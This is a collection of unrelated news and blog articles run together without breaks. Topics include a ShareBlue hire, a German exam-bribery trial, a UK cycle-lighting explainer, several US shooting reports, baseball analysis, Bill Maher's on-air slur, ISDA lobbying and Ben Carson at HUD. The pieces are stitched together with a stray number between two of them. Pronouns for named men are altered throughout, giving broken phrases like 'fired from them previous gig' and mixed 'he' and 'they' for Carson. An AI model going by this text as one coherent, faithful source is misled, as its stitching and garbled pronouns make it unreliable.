`` Now more than ever , people are hungry for substantive , incisive , fearless reporting — and that 's Sirota 's trademark , '' Brock said in a statement . He 's expected to announce Sirota 's hire at a gathering of progressive donors in Miami on Friday .
Despite Brock 's comparisons with a right-wing site driven explicitly by the goal of advancing politicized narratives , Sirota cast their role as that of an independent watchdog .
“ At a time when mass misinformation threatens journalism and American democracy , compelling accountability reporting is needed now more than ever , ” they said in the statement . “ The public is being inundated with gossip , half-truths , partisan propaganda and stories that have little connection to people 's daily lives — and all this is happening just as major crises threaten our country and our planet .
`` Our mission is straightforward : to fearlessly report on the most important issues of the day , to break original news , and to scrutinize the political forces and elite powerbrokers that affect — and often harm — the public at large . Our coverage areas will not be dictated by Beltway conventional wisdom , but instead by the real issues and crises facing millions of people throughout the country , '' Sirota said .
ShareBlue 's model has been to produce stories from a left-wing viewpoint to be shared on Facebook , where it has more than a million followers .
Sirota 's hire suggests that the site is moving beyond partisan argument and advocacy into combative reporting . Sirota is an award-winning investigative journalist whose work has often taken them into the intersection of corporate influence and government policy . Their work raised questions about the handling of pension funds by Republican governors in New Jersey and Massachusetts . Their investigation of the health care industry 's influence on the Democratic Connecticut state government prompted an official ethics probe into a massive merger .
They also have a history in the progressive wing of Democratic politics , and once worked as press secretary to then-Rep. Bernie Sanders .
Brock has been a key fundraiser for Clinton through super PACs like American Bridge and Correct the Record , as well as Media Matters , which they also founded . Earlier this month Brock posted a public letter to Bernie Sanders calling for all factions of the Democratic Party to `` unify in resistance '' to Trump .
Sirota replaces Peter Daou .
14110
Staatsexamen gegen Geld : Prozess gegen Richter startet am Mittwoch 15.12.2014
Ein Richter sitzt wegen Bestechlichkeit auf der Anklagebank . Das ist in Deutschland eher selten . Der Mann soll als Referatsleiter in Niedersachsen Prüfungsantworten für das zweite Examen verkauft haben . Das LG Lüneburg verhandelt den Fall ab Mittwoch .
Anzeige
Der Druck kann furchtbar sein - die Prüfung im Zweiten juristischen Staatsexamen entscheidet über die berufliche Zukunft deutscher Juristen . Wer zweimal durchfällt , der bekommt keine dritte Chance mehr und hat jahrelang vergeblich studiert . Eine gute Note dagegen eröffnet jede Menge Perspektiven , sei es als Richter , Staatsanwalt oder vielleicht als gut bezahlter Verteidiger in einer angesehenen Kanzlei . In Niedersachsen soll ein Referatsleiter des Landesjustizprüfungsamtes die Prüfungsantworten für viel Geld verkauft haben . Der langjährige Amtsrichter steht ab Mittwoch in Lüneburg vor Gericht .
`` Vorwürfe wie die jetzt erhobenen sind mir in meiner beruflichen Laufbahn noch nicht vorgekommen '' , sagt Frank Bornemann , Vorsitzender des Niedersächsischen Richterbundes . Und so steht dem Landgericht ( LG ) Lüneburg ein Mammutverfahren bevor , bis Ende Juni 2015 hat es 51 Verhandlungstage angesetzt . Die für Korruption zuständige Staatsanwaltschaft Verden wirft dem langjährigen Amtsrichter Bestechlichkeit in einem besonders schweren Fall , Verletzung des Dienstgeheimnisses und versuchte Nötigung vor .
Verfahren gegen 15 Absolventen eingeleitet
Rund 200 Sonderprüfer untersuchen seit Monaten nachträglich die Abschlüsse von 2.000 Volljuristen . Bislang seien die Prüfungen von 1.900 Absolventen abgeschlossen , heißt es im Justizministerium in Hannover . `` Es gibt 15 Fälle , bei denen Verfahren eingeleitet sind , die die Aberkennung des Zweiten Staatsexamens zum Ziel haben '' , sagt Sprecher Alexander Wiemerslage .
Weiterhin nichts will er dazu sagen , ob es auch Verdachtsfälle unter den 101 jungen Juristen gibt , die von der Sonderprüfung betroffen sind und heute als Richter oder Staatsanwälte arbeiten . Auszuschließen sei das nicht , hatte Justizministerin Antje Niewisch-Lennartz ( Grüne ) im Mai erklärt . Sollte einem Richter das Staatsexamen aberkannt werden , könnte das eine Lawine von neu aufzurollenden Prozessen auslösen , meinen Juristen .
Referendarin bringt Stein ins Rollen
Erste Verdachtsmomente hätten sich bereits April 2013 ergeben , berichtet Wiemerslage . Ein Wiederholer habe plötzlich Leistungen erbracht , die nicht plausibel gewesen seien . Ermittlungen hätten aber nicht zu einem hinreichenden Tatverdacht geführt , im Oktober seien sie eingestellt worden . Im Januar 2014 hatte sich dann eine Referendarin ans Justizministerium gewandt , eine Prüfungsskizze mit Lösungswegen sei ihr angeboten worden . Das war die Wende .
Mit einem europäischen Haftbefehl gesucht , war der Amtsrichter Ende März dieses Jahres in einem Mailänder Hotel aufgespürt worden . Im Juni wurde er ausgeliefert , seitdem sitzt der 48-Jährige aus dem Landkreis Lüchow-Dannenberg in Untersuchungshaft . Bei einer Verurteilung drohen ihm bis zu zehn Jahre Gefängnis .
dpa/una/LTO-Redaktion
Medway supermum Tania Sullivan has given birth to their 13th baby ... and has not ruled out having more .
Timothy Sebastian Sullivan was born at Medway Maritime Hospital and has now been released from the special care baby unit , where they were being helped with breathing difficulties .
They weighed a healthy 7lbs 12oz after 39-year-old Tania had a caesarian section .
Baby Timothy is Tania Sullivan 's 13th child
But they had to be moved to the Oliver Fisher unit when their oxygen levels dropped .
Tania and husband Mike , from Hoo , have been so impressed with their treatment that they have asked well-wishers to make donations to the department instead of sending cards and presents .
They said : `` The care we have all received has been tremendous and , while nothing we could do could possibly repay the staff and the care received , we are putting in plans in place to raise funds for the unit through our site . ''
Tania and Mike Sullivan at home with some of their children
When Tania , who has written three books based on their family , was asked if baby number 14 was planned , they replied : `` Who knows ? ''
Tania and Mike , 41 , have 10 children together – Caitlin , 14 , Harry , 11 , Eddie , nine , Sid , eight , Patrick , six , Oliver , four , Joseph , three , twins Anna and Libby , two , and Isobel , 15 months .
Tania has two older children from a previous relationship , Ben , 21 , and Stephanie , 19 .
As part of this year 's World Curry Festival , Canberra will again be hosting a fiery Chilli Eating Competition on both Saturday 8th and Sunday 9th July , to determine who in Canberra can handle the most Scovilles !
Think you can handle the heat ? Sadly it 's too late to register now as entries have closed . But you should still come along and watch brave men and women chomp through jalapenos ( about 2,500 Scoville heat units ) , serano peppers , Thai red chillies , habañeros , ghost chillies , Thai green chillies , Trinidad Scorpions , and finally , for the chilli-chomping legends , several Carolina Reapers , known as one of the world 's hottest chilli , with a Scoville score of around 2,200,000 ( which is close to standard pepper spray ) . Last year two blokes made it through four Carolina Reapers each before judges declared them equal winners .
Last year 's comp was very entertaining and made the Canberra TV news ! ABC reporter Siobhan Heanu certainly seemed to enjoy the sight of grown women and men breaking into a sweat in the middle of a Canberra winter .
If you have no idea about your Scoville resilience , try the dish below at the Red Chilli Sichuan Restaurant on Alinga Street . If you or your friends can finish it and want more – you 're probably ready for next year 's competition . If you 're not sure you can handle the Scovilles then bring along plenty of milk or yoghurt . But remember , if contestants in the chilli-eating competition take a sip of milk , pass out , or called an ambulance , they will be disqualified .
Had to share a photo of this beautiful fish dish @ Red # Chilli # Sichuan Restaurant # Canberra # TasteCanberra # VisitCanberra # nofilter # yesthereisfishunderallthatchilli ? A post shared by Elias ( @ elias_hallaj ) on Aug 3 , 2015 at 4:21am PDT
There is more information about the Chilli Eating Comp on the Facebook Page , including strict rules about disqualification .
The Chilli Eating Competition is just one small part of the Canberra World Curry Festival . The festival was created in 2015 out of love of food , culture and community . It 's a unique event that 's quite simply ‘ a celebration of all things curry ' . Foodies from far and wide come to experience the authentic tastes of Asia , Europe and Africa in the heart of Canberra 's City Centre . Vendors from all over will be gathering in the heart of the city to showcase their dishes , with over 30 stalls bringing flavours from India , Laos , Thailand , Sri Lanka , Philippines and more .
The festival will also include traditional Indian dances , entertainment as well as Canberra 's hottest Chilli Eating Competition . The World Curry Festival runs from the 7th to the 9th of July , with stalls open between 11am and 8pm each day . This free event will be located along City Walk and is family friendly .
There is a huge list of stallholders compared to previous years , including some of my favourites , like Bentspoke Beer , who will be making a special curried beer and spiced cider for this year 's festival !
And will Canberra dessert maestro Mr Frugii create another curry-flavoured sweet sensation to celebrate the festival ? only time will tell .
Essential details :
WHAT : Canberra World Curry Festival
WHERE : City Walk , Canberra
WHEN : from July 7th to 9th ( 11am – 8pm each day )
In the case of bad weather the event may be postponed , please click attending on the Facebook event for all the latest event updates .
Elias Hallaj ( aka CBRfoodie ) is a part-time food blogger and full-time political staffer who has joined RiotACT as a regular contributor . All their opinions about Canberra chilli eating are their own . Do n't worry they are trying to cut back on eating too much chilli at night as it gives them heart burn , but insists it 's just too damned tasty . If you have any tips or feedback or advice about chilli or curry you can add a comment below or find them most nights on Twitter @ CBRfoodie .
This weekend the clocks go back , so if you 're not already coming home from work in the dark , on Monday you surely will be and in addition to whatever else you may have been persuaded to festoon your bike and person with , to be legal you will need :
Fixed to the bike itself , NOT dangling from your belt or perched on top of your hat…
An ‘ approved ' white front light
An ‘ approved ' red rear light
An ‘ approved ' red rear reflector
And ‘ approved ' pedal reflectors facing both ways on both pedals .
What 's does ‘ approved ' mean , you may well ask , because the bike shop is unlikely to have mentioned it when they sold you those lights . It means that the lamp is designed to conform with BS6102 part 3 , and is marked accordingly .
That was fine back in the 1970s , when the likes of Ever-Ready mass-produced bike lamps in Britain and sold them around the world . Nowadays however , everything plastic with batteries comes from Asia , which manufactures in volume for the American market , where they do n't have any lighting standards for bikes at all ! Almost anything goes on a bike over there . And since we speak more or less the same language : everything that goes over there comes over here too !
We were ( and still are ) only too pleased to sell , buy and use these laissez-faire lamps , which were initially cheaper and generally work better than lamps that are hidebound by a standard . Deprived of any British manufacturing or retail interest to keep them up to date , British Standards were soon left behind by the state of the art . One Asian manufacturer , Cat-Eye , nevertheless continued to ‘ do the right thing ' by designing a few of its lamps to BS6102/3 , and getting it revised to allow LEDs . British retailers however , did not reward Cat-Eye 's efforts by drawing customers ' attention to the unique selling point , that these were the only battery lights you could ride legally with in the dark . I guess shops were reluctant to make it obvious that all the other lamps in the shop would only do as extras !
There are other ways for a lamp to be approved . If it flashes it simply has to be bright enough and flash at a rate between once and four times per second . But if the lamp also has a steady mode it 's back to BS for approval . Most flashing lights unfortunately , also have a steady mode – and are strangers to BS .
Another option is to conform with the approval system of another EC country – but only if that approval gives as much safety as BS6102/3 . Most do n't . The only other EC approval that 's at least as demanding as BS6102/3 is German ‘ StVZO ' , indicated by a K~number mark on the lamp . Germany has supported its established dynamo lighting manufacturers in many ways , such as requiring a dynamo system to be fitted and in working order ( not necessarily switched on ) at all times on all bikes weighing over 11kg , and by keeping their lighting standards up to date . So they still have a sizeable cycle lighting industry - mostly dynamo . And since there are 80 million Germans , most of whom ride bikes , there 's no point in anyone else making dynamo lights unless they can sell them in Germany . So its good news for dynamo users : nearly all dynamos and dynamo lamps do have this approval . A few battery lamps ( made to go on German racing bikes ) also have a K~number , but not many are sold in UK .
Most lamps have an EC mark and this will often be pointed out by a dealer anxious to please . But that EC mark has nothing to do with its performance as a lamp – just means it is n't toxic or likely to electrocute ! There ought to be but is n't as yet , any harmonised EC-standard of approval for the performance of bike lamps .
So short of fitting a dynamo system ( do n't scoff , modern dynamo lights are brilliant and stay on when you stop ) the chances are you 'll be technically illegal when cycling at night , no matter how bright your ( battery ) lights . Fortunately , Police seldom bother to look for approval marks on bike lamps and will be happy to see a white light in front and red behind . Some will pick up on the lack of a rear reflector , so better have one of those too . And fortunately it 's easy to get an approved one , because the standards for those are internationally harmonised .
Pedal reflectors however , are another problem . When you can get them they 'll be approved alright , but all too often you ca n't . And if you ask your friendly local cycle shop they may even deny that they 're needed . ( I guess that when reflectors can not be had for most of the pedals in the shop , it 's easy to suppose that they 're optional ! ) Nowadays only low-tech pedals can be fitted with reflectors , plus a few of Shimano 's clipless models .
Lack of pedal reflectors is also unlikely to be noticed by the Police . But whereas an unapproved light is likely to be just as effective as an approved one , the lack of pedal reflectors does make a difference . Research by TRRL proved that lights will get you noticed from the greatest distance , but pedal reflectors provide the most distance identification that the thing in front with a light is a pedal cycle – rather than a more distant motor-cycle . And that identification is important , because a driver will need to brake and/or steer around a pedal cycle pretty soon after seeing it . But that research was done in the 80s , before flashing lights existed . Nowadays they 're on most bikes and only on bikes . No other vehicle is allowed to mount a flashing red light , so one of those also uniquely identifies a pedal cycle – perhaps from a greater distance than pedal reflectors .
CTC suggests that in addition to de-regulating cycle lighting to take out the approval stumbling block , an additional rear light , resulting in one flashing and one steady rear light , shall be allowed to substitute for pedal reflectors . If you think that 's a good idea too , please write to your MP . Let 's make this the last winter when so many responsible , law-abiding cyclists can not avoid riding illegally in the dark .
STOCKTON ( CBS13 ) – A 21-year-old man became Stockton 's second homicide victim of 2013 and their friend has been charged in their death , police said Tuesday .
The shooting happened late Monday night at a duplex in the 5400 block of Holiday Drive . Police were called to the Kaiser Permanente building at 7300 N. West Lane shortly before midnight after friends tried to take the victim there and found out it was closed .
Alexander Centenco of Stockton was transported to a local hospital but was pronounced dead there .
Police dispatch received a call that the suspect showed up later at a home in the 6100 block of Alturas Avenue . Officers went to that location and arrested Andrew Torres , 19 , of Stockton without incident .
Officers located a firearm near where the suspect was arrested and a small amount of narcotics at the victim 's house .
After the interviews were finished , police determined Torres “ negligently discharged a firearm inside the residence which resulted in the victim being shot . ”
Torres was booked into the San Joaquin County Jail for murder .
Reader Zac Fieroh recently wrote an interesting FanPost in which they analyzed the biggest problem area in the 2015 Detroit Tigers ' bullpen . Determining why a plan failed by identifying the weakest link in the chain can be a valuable exercise , and the post explained that the pitching in the seventh inning was easily the Tigers ' worst problem .
Let 's take that analysis one step further . We have identified the seventh inning as the weak link , but we need to know why it broke before we can determine whether it 's fixed . Which pitchers are to blame , and are they still being relied upon in a similar role ? What exactly happened in those innings ?
Al Alburquerque was Brad Ausmus ' de facto `` seventh-inning guy '' for most of the season , and they led the team with 87 plate appearances in the seventh . They held hitters to a .650 OPS in the frame , so they are n't necessarily part of the problem . The issue must be rooted elsewhere .
Blaine Hardy saw the second-most mound time in the seventh , and got hit to the tune of a .779 OPS in their 63 plate appearances . That 's less than ideal , and Hardy could be pointed to as one reason why the seventh inning was such a struggle .
That 's pretty odd , right ? Hardy had a good season . Their OPS-against in innings other than the seventh was only .682 , which is just fine . The .432 BABIP against them during the seventh inning is a big red flag . Hardy 's results were certainly part of the problem , but it 's hard to blame Hardy himself . This looks more like old-fashioned bad luck in a small sample of data .
So Alburquerque was fine , and Hardy got unlucky , let 's keep moving . Next on the list is Anibal Sanchez , who got absolutely rocked in their seventh-inning plate appearances . Then David Price , who allowed a very un-Price-like .731 OPS , and Alfredo Simon with a .776 OPS .
Are you starting to notice a pattern ? Those guys are all starters . Maybe this bullpen problem is n't really a bullpen problem after all .
PA BA OBP SLG OPS Anibal Sanchez 61 .308 .383 .692 1.076 David Price 58 .298 .310 .421 .731 Alfredo Simon 58 .333 .368 .407 .776 Justin Verlander 50 .340 .380 .404 .784
Nearly half of the Tigers ' seventh-inning plate appearances were pitched by one of their veteran starters , a group that was rightfully expected to perform at a higher level than a typical middle innings reliever . Collectively , they allowed a .843 OPS , with Sanchez by far the worst offender .
When you see a phenomenon such as this , it 's fair to wonder if there is one flaw in team philosophy rather than four separate flaws in four individuals . Perhaps the coaching staff has a tendency to leave their starter in one inning too long ? Consider this snippet from the 2016 Baseball Prospectus Annual .
We noted last year that Ausmus ' Tigers led the majors in blown quality starts . We could n't figure out why , though we offered three theories : 1 ) Ausmus had n't adjusted to the pace of the game from the bench ; 2 ) Ausmus figured their bullpen would blow the game anyway ; and/ or 3 ) Ausmus was too darn stubborn to change pitchers . Whatever explanation or combination of explanations applied in 2014 probably worked for 2015 as well , because the Tigers again led the majors in blown quality starts .
Blown Quality Starts measure games in which a starting pitcher has registered a quality start through six innings , but lost it by allowing a fourth run later . The Tigers have led the majors in Blown Quality Starts in each of Ausmus ' two seasons as manager . Furthermore , the Tigers ' starters threw more total pitches than any other staff in 2014 , and ranked fourth in starts of at least 100 pitches in 2015 , despite having one of the worst rotations in baseball .
This is a small pile of evidence pointing towards one conclusion : Ausmus has a habit of leaving their starting pitchers in the game too long , and that contributed to a big chunk of the seventh-inning woes last year .
Perhaps they 've preferred to stick with their starting pitcher longer than would normally make sense due to their bullpen 's resemblance to a conflagration of a large waste receptacle . This argument does hold water , and was presented in the BP Annual over a year ago . But Alburquerque has been the preferred pitcher to relieve the starter over the last two seasons , and they have performed well in the role .
Hopefully better relief options this season will provide Ausmus more reason to pull their starters before they fall apart . Al Avila 's revamped bullpen was desperately needed , but it wo n't mean much if the starters are continually allowed to pitch one inning too many .
Girl , 6 , hit in NE OKC drive-by shooting Share Shares Copy Link Copy
Hide Transcript Show Transcript
WEBVTT NORTHEAST AND I-35 . 23RDJONATHAN : IT WAS IN THIS AREA LAST NIGHT WHERE POLICE SAY A YOUNG CHILD WAS SHOT IN A DRIVE-BY SHOOTING . AND THAT WAS JUST THE START OF A VIOLENT NIGHT ACROSS OKLAHOMA CITY . > > I DID HEAR THE SHOOTING WHEN IT STARTED . JONATHAN : THE NIGHT BEFORE THANKSGIVING A BUSY ONE FOR , OKLAHOMA CITY POLICE OFFICERS . MULTIPLE PEOPLE SHOT IN DIFFERENT SHOOTINGS ACROSS THE CITY . THE LITTLE GIRL SHOT INSIDE OF FIRST ONE , 23RD AND I-35 . Them HOME NEAR NORTHEAST 23RD AND I-35 . > > MY HEART GOES OUT TO THEM AND I JUST PRAY They Are OK. JONATHAN : NEIGHBORS SAY THEY 'RE NOW ON ALERT BECAUSE ACCORDING TO POLICE , A DRIVE BY SHOOTER HIT THE FAMILY 'S HOME . > > THIS IS USUALLY A VERY QUIET BLOCK . JONATHAN : LESS THAN AN HOUR LATER A MAN WAS INJURED IN , ANOTHER SHOOTING NEAR I-240 AND SANTA FE IN THE PARKING LOT OF A WALMART . AND A FEW HOURS AFTER THAT , POLICE SAY TWO MORE PEOPLE WERE INJURED IN A SHOOTING NEAR RENO AND MERIDIAN . POLICE BELIEVE THAT SHOOTING HAPPENED AFTER A BAR FIGHT SPREAD TO THE INTERSECTION . POLICE ARE NOT RELEASING A LOT OF INFORMATION ABOUT THE SHOOTINGS BUT THEY HAVE NOT REPORTED ANY ARRESTS IN ANY OF THEM . REPORTING NEAR NORTHEAST 23RD AND I-35 , JONATHAN COOPER , KOCO
Update
6:43 p.m. THURSDAY , OCT. 30 : The death of a man found deceased in a wooded park yesterday in San Marcos has preliminarily been ruled a suicide .
San Marcos Police investigators working on the case last night and today learned new information and recovered additional evidence indicating that Gregg G. Candelora ( DOB 06/27/1980 ) took their own life . The Travis County Medical Examiner 's office has also preliminarily ruled the death a suicide after conducting an autopsy on the body today . The family has been notified .
Candelora was found deceased near the 800 block of Chestnut Street at 11:45 a.m. Wednesday , Oct. 29 when police responded to a welfare check called in at 11:30 a.m. by a person who found them while walking through the woods . They were previously reported missing by their brother and their ex-girlfriend .
Candelora had been last seen about 1 p.m. Sunday , Oct. 26 .
Police considered their death suspicious , and the area where their body was found was treated as a crime scene in accordance with SMPD standard operating procedure when investigating unattended deaths .
The scene took an extended amount of time to investigate due to the steep , heavily wooded nature of the undeveloped parkland area . Officers from the Texas State University Police Department and the Texas Department of Public Safety , as well as firefighters from the San Marcos Fire Department , assisted San Marcos police . San Marcos Water/Waste Water Department crews provided survey equipment and helped officers map the scene .
“ We want to express our appreciation to the members of the public , public safety organizations and our own city utility crews who assisted in this case , ” said Assistant Police Chief Bob Klett . “ The information provided by the public helped us resolve this case and bring closure to Mr. Candelora 's family . ”
Earlier
3:36 p.m. THURSDAY , OCT. 30 : San Marcos police have identified the body of a San Marcos man found in a wooded area near a construction project on the 800 block of Chestnut Street in San Marcos .
Gregg G. Candelora , 34 , was found deceased at 11:45 a.m. Wednesday , Oct. 29 when police responded to a welfare check called in at 11:30 a.m. by a person who found them while walking through the woods . They were previously reported missing by their brother and their ex-girlfriend .
Candelora had been last seen at about 10:30 a.m. Sunday , Oct. 26 .
Police are considering their death suspicious , and the area where their body was found is being treated as a crime scene in accordance with SMPD standard operating procedure when investigating unattended deaths .
Candelora 's body has been transported to the Travis County Medical Examiner 's Office for an autopsy .
People with information on Candelora 's whereabouts after Sunday morning may submit tips at www.citizenobserver.com or by calling the SMPD Criminal Investigation Division at 512-753-2300 during normal business hours or the police non-emergency number at 512-753-2108 .
Comedian Bill Maher went from the hosting seat to the hot seat after using a racial epithet during Friday night 's episode of of their weekly HBO program , “ Real Time with Bill Maher. ” They have since apologized , after having provoked a firestorm of controversy and a statement of disavowal from a network executive .
Mr. Maher was conducting a live interview Friday evening with Republican Senator Ben Sasse when the late-night host used the N-word while discussing the lawmaker 's home state of Nebraska .
“ I 've got to get to Nebraska more , ” Mr. Maher quipped .
“ You 're welcome , ” Mr. Sasse responded . “ We 'd love to have you work in the fields with us . ”
“ Work in the fields ? ” Mr. Maher fired back . “ Senator , I am a house [ expletive ] . ”
The exchange was aired live and uncensored by HBO during the 10 p.m. hour and instantly triggered an audibly mixed reactions from the show 's studio audience .
“ No , it 's a joke , ” Mr. Maher said moments later before moving the segment along .
Network officials apparently disagreed .
“ Bill Maher 's comment last night was completely inexcusable and tasteless ” HBO 's executive vice president of corporate communications , Quentin Schaffer , said in a statement Saturday . “ We are removing their deeply offensive comment from any subsequent airings of the show . ”
Mr. Maher issued an apology of their own later Saturday afternoon , stating in part : “ I regret the word I used in the banter of a live moment . The word was offensive , and I regret saying it and am very sorry . ”
For their part , Mr. Sasse , who uncomfortably grinned and nodded in response to Mr. Maher 's comment , also spoke out on the matter via Twitter .
“ I 'm a 1st Amendment absolutist . Comedians get latitude to cross hard line , ” Mr. Sasse said through their official Twitter account Saturday morning . “ But free speech comes with a responsibility to speak up when folks use that word . Me just cringing last night was n't good enough . ”
“ Here 's what I wish I 'd been quick enough to say in the moment : ‘ Hold up , why would you think it 's OK to use that word ? ” Mr. Sassse continued . “ The history of the n-word is an attack on universal human dignity . It 's therefore an attack on the American Creed . Do n't use it . ”
Indeed , Mr. Maher 's remark has prompted heated reactions from social media users across the political spectrum .
“ But really , @ BillMaher has got to go , ” tweeted Deray McKesson , a Black Lives Matter organizer and former Democratic candidate in the 2016 mayoral race in Baltimore . “ There are no explanations that make this acceptable , ”
“ Bill Maher must be fired immediately for their racism and belittling the struggle of millions of black Americans , ” agreed Jack Posobiec , a self-described author and filmmaker widely associated with the alt-right movement .
“ Disagree with their politics , but Bill Maher has defended the right on free speech issues , we should defend him , ” tweeted Paul Joseph Watson , a widely-followed Twitter user and editor-at-large for the far-right Infowars website .
A publicist for Mr. Maher did not immediately respond to a request for comment , the New York Times reported Saturday morning .
“ Real Time ” is currently in its fifteenth season on HBO . Mr. Maher , 61 , was fired from them previous gig hosting “ Politically Incorrect ” on ABC following comments they made a week after the September 11 , 2001 terrorist attacks .
Copyright © 2019 The Washington Times , LLC . Click here for reprint permission .
Texas Rangers pitcher Luke Jackson reacts after a pitching session during a workout at the Rangers spring training facility in Surprise , Arizona Monday February 23 , 2015 . ( Andy Jacobsohn/The Dallas Morning News )
SURPRISE , Ariz. - Right-hander Luke Jackson , the organization 's pitcher of the year in 2013 , will try out a refined delivery Monday against the Los Angeles Angels .
Since the start of camp , the Rangers have reworked Jackson 's delivery in hopes of improving their control . Jackson struggled after being promoted to Triple-A Round Rock last season , allowing 28 walks in 40 innings . They made their only exhibition appearance March 7 and walked two of the seven Milwaukee hitters faced .
The changes are intended to produce a slower and more methodical delivery .
`` It 's nothing major , '' Jackson said . `` It 's gone really well . I feel good with it . ''
Briefly : Second baseman Rougned Odor will undergo a root canal Monday and will be day-to-day . … The Rangers will ask Major League Baseball to clarify whether a batted ball hitting a fielder is a reviewable play . On Saturday against San Diego , the Rangers thought a liner was caught in the air by Odor after skimming off the foot of reliever Juan Carlos Oviedo . The umpiring crew ruled the ball hit the mound , turning it into a grounder .
Josh observed earlier that the International Swaps & Derivatives Association was one of the major lobby groups helping to ensure that derivatives contracts got special repayment privileges from creditors under the 2005 bankruptcy bill . Which got me wondering … the ISDA must be shaking in its loafers over the possibility of stronger regulation passing Congress this year . Which D.C. lobbyists are in their corner ?
Here 's what I found : a healthy $ 1.9 million in lobbying spending for 2008 , more than twice as much as embattled bank UBS and comparable to the lobby bills of Credit Suisse , one bank heavily tied to derivatives trading and other complex financial instruments .
The lobbyist lineup for ISDA looks like a staff alumni list for top GOPers ( and a few Dems ) : Greg Zerzan , Robert Pickel : The ISDA 's two in-house lobbyists reaped the bulk of the group 's lobbying spending , at $ 1.5 million . Zerzan is a former senior Treasury Department official under George W. Bush , as well as an ex-counsel to two House committees with a key role in the derivatives debate . Pickel was a former counsel to the Amerada Hess oil company before joining the ISDA .
Brant Imperatore , BGR Group : A former counsel to ex-House Financial Services Committee Chairman Mike Oxley ( R-OH ) . BGR was co-founded by now-Mississippi Gov . Haley Barbour ( R ) , an ex-RNC chairperson and former Bush fundraiser Lanny Griffith .
Don Moorehead , Kirsten Wegner : Both lobby for Patton Boggs , where Moorehead is a 25-year veteran and Wegner is a recent arrival who specializes in giving clients “ strategic advice ” on the government 's financial bailout .
J. Patrick Cave , Ben DuPuy , Alexander Sternhell : All three hail from the Cypress Group , which was founded in 2005 with the counter-intuitive mission of lobbying and affordable housing ( the firm 's realty arm won a contract to rebuild New Orleans homes after Hurricane Katrina ) . Cave is a former aide to ex-Rep. Richard Baker ( R-LA ) , a senior House Financial Services member , while Sternhell is a former Democratic aide on the Senate Banking Committee . DuPuy is a former aide to Sen. Jeff Sessions ( R-AL ) and an ex-lobbying for the National Rifle Association .
Alan Sobba , Sobba Public : Until 2007 , they served as external affairs director for the Commodity Futures Trading Commission — the body charged with regulating ( or not regulating , as the case may be ) derivatives trading . Their duties included supervising the agency 's contacts with Congress .
Edward Rosen , Cleary Gottlieb : Has advised the biggest Wall Street trade associations in Washington , including the Securities Industry and Financial Markets Association , the Securities Industry Association , and The Bond Market Association .
God is Ben Carson 's favorite subject . Brain surgery is a close second . Housing is somewhere further down the list .
“ I was told that as a government leader , I really should n't talk about God . But I have to tell you , it 's part of who I am , ” Carson said last month , in one of their first speeches as Housing and Urban Development secretary .
Story Continued Below
Less than two months into the job , Carson still holds forth on God and neurosurgery , but their views on housing policy remain largely a mystery . While he 's making good on a promised listening tour to learn about the $ 48 billion agency they now lead , he 's done little public speaking about the urgent issue at hand — a lack of affordable housing .
That 's one reason why early excitement over their nomination has given way to bewilderment and now frustration . Every policy job at the agency remains vacant , and advocates who thought Carson 's celebrity would raise awareness of affordable housing have been disappointed . President Donald Trump doused any remaining hope when they said they would slash HUD funding by 13.2 percent .
Carson told POLITICO that policy proposals are in the works , but in public appearances the one-time presidential candidate is sticking to their stump-speech staples . They prescribe “ godly principles ” as a cure for the country 's political division and praises housing advocates for “ putting God 's love into action . ”
“ Speaking of God , which I love to do ; quite frankly , he 's a great guy , ” Carson said on March 28 , drawing friendly laughter during a speech to the National Association of Hispanic Real Estate Professionals . “ We should be grateful that God gave us variety . But you know what they didn ‘ t give us variety in ? The brain . ”
With that , the secretary — an acclaimed pediatric neurosurgeon — was off and running to their other favorite subject . Housing experts brought on stage to analyze their remarks were flummoxed .
“ I was trying to take notes on what they were saying about housing , ” said Armando Falcon , chief executive at Falcon Capital Advisors , waving a piece of blank paper . “ I could have filled a page with neurosurgery notes . ''
Faith groups are deeply embedded in the affordable housing firmament , which has greeted Carson 's speeches as part motivational , part sermon and part lecture . The secretary offers no apologies .
“ One of the most important parts of our Constitution is freedom of religion . There 's a mistaken thinking that we 're not supposed to talk about God , ” Carson told POLITICO . “ Godly principles and loving your fellow man and caring about your neighbor , there 's nothing wrong with that . ”
But lately , their up-by-the-bootstraps message has been falling flat with anti-poverty audiences .
“ It 's a great story , but it 's a dangerous message because not everybody can pull themselves up by their bootstraps , ” said Maria Foscarinis , executive director of the National Law Center on Homelessness and Poverty . “ Nobody does that , including Secretary Carson . They had a lot of support — their mother , their family , their faith . They had a whole context of support . ”
So when the secretary got stuck in an elevator while touring a Miami housing project on April 12 , Twitter was ruthless and late-night TV had its fun . Carson 's allies spun a good-natured silver lining — at least all those millennials watching Jimmy Kimmel now know that the secretary is on a listening tour .
That tour , which will wrap up in early June , has inspired a clutch of anti-Trump protesters devoted to the HUD secretary . CarsonWatch , launched with $ 75,000 in seed money , will highlight the secretary 's lack of experience and the agency 's threatened budget cuts . The group calls the listening tour “ fake . ”
“ It 's been mostly an opportunity to do well-staged photo ops , ” said Guillermo Mayer , chief executive of Public Advocates , a civil rights group affiliated with CarsonWatch . “ He 's so far making empty promises that these cuts will be made up in the infrastructure bill . Show me the language and the votes . ”
Carson said that while housing will be part of Trump 's infrastructure bill , that legislation wo n't fill funding gaps at HUD . To meet the president 's spending targets , the agency will find ways to cut waste and be more efficient , they said .
As they learn their way around the HUD bureaucracy , Carson expects to start announcing policy plans in the next 90 days . High on their list of priorities is bringing new life to a program known as Section 3 , which creates local jobs when agency money is spent on a project .
“ It 's been largely ignored because people say we do n't have local people who know how to weld or have plumbing skills , ” Carson said in the interview . “ That is true . However we do have a brain , which means we have the ability to think ahead . We know well more than a year ahead of time when we 're going to start a major project . Why not go in and train people in that area at that time so they 're ready ? ”
“ We 're moving away from the concept of just housing people to the concept of developing people , ” Carson said .
The housing community , a large , unwieldy group that includes labor , civil rights and faith-based activists as well as Wall Street firms and state and local governments , has been meeting in Washington to coordinate a budget message and present a united front to Congress . The groups take Carson 's assurances that nobody will be “ thrown out on the streets ” with strong skepticism .
Breaking News Alerts Get breaking news when it happens — in your inbox . Email Sign Up By signing up you agree to receive email newsletters or alerts from POLITICO . You can unsubscribe at any time .
“ He has a deep well of compassion ; that 's very clear when you meet him . The question remains if that translates into understanding the magnitude of what he 's overseeing and the depth of the need , ” said Shola Olatoye , chief executive officer of the New York City Housing Authority . “ Yes , people should work and yes , health is important , but we have n't heard about the bricks and mortar . ”
Already , some people are being denied housing aid in anticipation of budget cuts . Soon after Trump released their plan , some agencies stopped redistributing rental subsidy vouchers under Section 8 , a HUD program with a waiting list of low-income households . Hundreds of thousands of families are on those lists , which have a median wait time of 18 months , according to the National Low Income Housing Coalition .
